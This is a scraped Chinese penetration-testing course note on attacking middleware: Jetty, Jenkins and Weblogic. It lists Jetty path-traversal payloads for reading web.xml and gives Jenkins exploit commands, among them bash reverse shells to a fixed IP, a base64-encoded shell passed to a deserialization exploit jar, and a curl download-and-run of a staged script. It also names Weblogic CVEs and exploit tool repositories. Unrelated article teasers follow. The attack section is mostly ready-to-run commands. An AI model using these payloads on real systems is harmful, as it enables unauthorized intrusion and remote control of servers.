DAY80服务攻防-中间件安全HW2023-WPS 分析WeblogicJettyJenkinsCVE

news/2024/11/17 19:39:05/

知识点

1、中间件-Jetty-CVE&信息泄漏

2、中间件-Jenkins-CVE&RCE执行

3、中间件-Weblogic-CVE&反序列化&RCE

4、应用WPS-HW2023-RCE&复现&上线CS

中间件-Jetty-CVE&信息泄漏

Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/static?/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.

CVE-2021-34429(信息泄露)

CVE-2021-28169(信息泄露)

中间件-Jenkins-CVE&RCE执行

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作、探针

默认端口:8080

cve_2017_1000353

bash -i >& /dev/tcp/1.92.144.175/5566 0>&1

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjE0NC4xNzUvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}"

JDK-1.8.0_291 其他版本失效

python exploit.py http://1.92.144.175:50780 jenkins_poc.ser

CVE-2018-1000861

利用工具:https://github.com/orangetw/awesome-jenkins-rce-2019

bash -i >& /dev/tcp/1.92.144.175/6666 0>&1

python3 -m http.server 8888

python2 exp.py http://1.92.144.175:25257/ "curl -o /tmp/1.sh http://1.92.144.175:8888/11.txt"

python2 exp.py http://1.92.144.175:25257/ "bash /tmp/1.sh"

cve_2019_1003000

需要用户帐号密码:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

中间件-Weblogic-CVE&反序列化&RCE

Weblogic是Oracle公司推出的J2EE应用服务器。

默认端口:7001

利用工具:https://github.com/KimJun1010/WeblogicTool

CVE-2023-21839(JNDI)

CVE-2020-2551(JRMP)

CVE-2020-2551

CVE-2020-2555

CVE-2020-2883

CVE-2020-14882未授权访问

CVE-2018-2894

CVE-2018-2628(JRMP)

CVE-2018-2893(JRMP)

CVE-2018-3245(JRMP)

CVE_2018_3252(JRMP)

CVE_2018_3191

CVE-2016-3510

CVE-2016-0638

CVE-2017-10271

CVE-2017-3248(JRMP)

CVE-2015-4852


http://www.ppmy.cn/news/1531588.html

相关文章

vscode 的terminal 输出打印行数限制设置

修改 VSCODE 的 settings.json文件 "terminal.integrated.scrollback": 100000, {"extensions.ignoreRecommendations": true,"workbench.colorTheme": "Monokai","explorer.confirmDelete": false,"editor.fontSize…

自动化测试实例:Web登录功能性测试(无验证码)

🍅 点击文末小卡片 ,免费获取软件测试全套资料,资料在手,涨薪更快 一、什么是自动化测试 把人为驱动的测试行为转化为机器执行的一种过程称为自动化测试。(来自百度百科)本质上来说,自动化测试对比起手工测试除了需要…

Linux云计算 |【第四阶段】PROJECT2-DAY2

综合项目内容: 升级网站运行平台、部署Redis内存存储服务集群、数据迁移、部署PXCMySQL实现强同步、部署LB和HA集群 一、项目拓扑结构 PROJECT2-DAY1回顾: 服务架构缺点分析: ① 数据存储结构存在单点故障(需增调度器&#xff0…

Harbor使用

文章目录 1、上传镜像1.1、在Harbor上创建一个项目1.2、docker添加安全访问权限1.3、推送docker镜像到该项目中1.3.1、登录到Harbor1.3.2、给镜像重新打一个标签1.3.3、推送镜像到Harbor中 2、拉取镜像2.1、先删掉原来的镜像2.2、执行拉取命令 1、上传镜像 需求:将…

Service nxpnfc_hal_svc

类似service启动 主要分为两部分 service nxpnfc_hal_svc /vendor/bin/hw/vendor.nxp.nxpnfc1.0-serviceclass haluser nfcgroup nfc 1.nxpnfc_hal_svc,这个一般是权限te device/rockchip/common/sepolicy/nxp_nfc_server.te type nfc_vendor_data_file, file_t…

frp内网穿透服务器+客户端详细配置

当我们拥有一台云服务器时,可以将局域网服务器的服务通过内网穿透发布到公网上。frp是一个主流的内网穿透软件,本文讲解frp内网穿透服务器客户端详细配置。 一、需要准备的内容: 腾讯云服务器:https://curl.qcloud.com/Sjy0zKjy 2…

Linux如何通过链接下载文件

在Linux系统中,你可以通过多种方式通过链接下载文件。这些方式包括使用命令行工具(如wget、curl、axel等)和图形界面程序(如浏览器或文件管理器)。以下是几种常用的命令行方法: 1. 使用wget wget是一个非交…

CSS定位详解:相对定位、绝对定位、固定定位与 z-index

目录 非 VIP 用户可前往公众号回复“css”进行免费阅读 相对定位 绝对定位 固定定位 z - index 非 VIP 用户可前往公众号回复“css”进行免费阅读 相对定位 相对定位的作用是对元素自身原本的位置进行微调。它不会脱离文档流(即不脱标),其真实位置仍在 “原处…